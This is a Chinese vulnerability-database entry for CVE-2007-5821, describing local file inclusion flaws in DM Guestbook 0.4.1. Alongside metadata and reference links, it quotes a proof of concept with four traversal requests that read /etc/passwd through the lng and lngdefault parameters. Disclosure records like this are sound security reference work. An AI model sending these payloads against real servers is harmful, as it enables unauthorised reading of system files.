DM Guestbook 多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113891 漏洞类型 路径遍历
发布时间 2007-11-02 更新时间 2007-11-15
CVE编号 CVE-2007-5821 CNNVD-ID CNNVD-200711-061
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/4597
https://www.securityfocus.com/bid/26300
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-061
|漏洞详情
DMGuestbook中存在多个目录遍历漏洞,远程攻击者借助(1)对(a)guestbook.php,(b)admin/admin.guestbook.php,或(c)auto/glob_new.php的lng参数;或(2)对auto/ch_lng.php的lngdefault参数包含和执行任意本地文件。
|漏洞EXP
#  DM Guestbook <= 0.4.1 Multiple Local File Include Vulnerabilities
#  http://sourceforge.net/project/showfiles.php?group_id=101364 /guestbook.0.4.1/
#  POC :
#  /guestbook.php?lng=../../../../../../../etc/passwd%00
#  /admin/admin.guestbook.php?lng=../../../../../../../etc/passwd%00
#  /auto/glob_new.php?lng=../../../../../../../etc/passwd%00
#  /auto/ch_lng.php?lngdefault=../../../../../../../etc/passwd%00

# milw0rm.com [2007-11-02]
|受影响的产品
DM Guestbook 0.4.1
|参考资料

来源:XF
名称:dmguestbook-lngdefault-file-include(38219)
链接:http://xforce.iss.net/xforce/xfdb/38219
来源:MILW0RM
名称:4597
链接:http://www.milw0rm.com/exploits/4597
来源:OSVDB
名称:39067
链接:http://osvdb.org/39067
来源:OSVDB
名称:39066
链接:http://osvdb.org/39066
来源:OSVDB
名称:39065
链接:http://osvdb.org/39065
来源:OSVDB
名称:39064
链接:http://osvdb.org/39064
来源:BID
名称:26300
链接:http://www.securityfocus.com/bid/26300
来源:VUPEN
名称:ADV-2007-3747
链接:http://www.frsirt.com/english/advisories/2007/3747